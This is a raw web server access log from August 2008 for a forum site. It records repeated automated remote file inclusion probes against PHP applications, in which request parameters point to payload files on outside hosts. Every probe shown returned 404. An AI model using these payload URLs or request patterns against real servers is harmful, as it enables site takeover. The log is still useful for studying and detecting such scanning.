213.194.149.146 - - [25/Aug/2008:08:12:19 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "collegiateforum.org"
213.194.149.146 - - [25/Aug/2008:08:12:19 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "collegiateforum.org"
213.194.149.146 - - [25/Aug/2008:08:12:19 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "collegiateforum.org"
67.15.116.252 - - [25/Aug/2008:08:13:01 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.netops-fr.info/remote/ident.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "collegiateforum.org"
67.15.116.252 - - [25/Aug/2008:08:13:01 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.netops-fr.info/remote/ident.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "collegiateforum.org"
67.15.116.252 - - [25/Aug/2008:08:13:02 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.netops-fr.info/remote/ident.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "collegiateforum.org"
84.16.251.245 - - [25/Aug/2008:08:13:21 -0700] "GET /errors.php?error=http://albgroup.webng.com/Id/Bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.collegiateforum.org"
84.16.251.245 - - [25/Aug/2008:08:13:22 -0700] "GET /logs/errors.php?error=http://albgroup.webng.com/Id/Bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.collegiateforum.org"
83.222.31.133 - - [25/Aug/2008:08:13:28 -0700] "GET /logs/access_080324.log//?path%5Bdocroot%5D=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
213.194.149.146 - - [25/Aug/2008:08:15:14 -0700] "GET /logs/access_080324.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.collegiateforum.org"
213.194.149.146 - - [25/Aug/2008:08:15:15 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.collegiateforum.org"
200.49.100.20 - - [25/Aug/2008:08:15:15 -0700] "GET /logs/access_080121.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.collegiateforum.org"
213.194.149.146 - - [25/Aug/2008:08:15:15 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.collegiateforum.org"
89.208.43.121 - - [25/Aug/2008:08:15:59 -0700] "GET /logs/access.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.194.149.146 - - [25/Aug/2008:08:16:16 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "collegiateforum.org"
213.194.149.146 - - [25/Aug/2008:08:16:16 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "collegiateforum.org"
213.194.149.146 - - [25/Aug/2008:08:16:16 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linu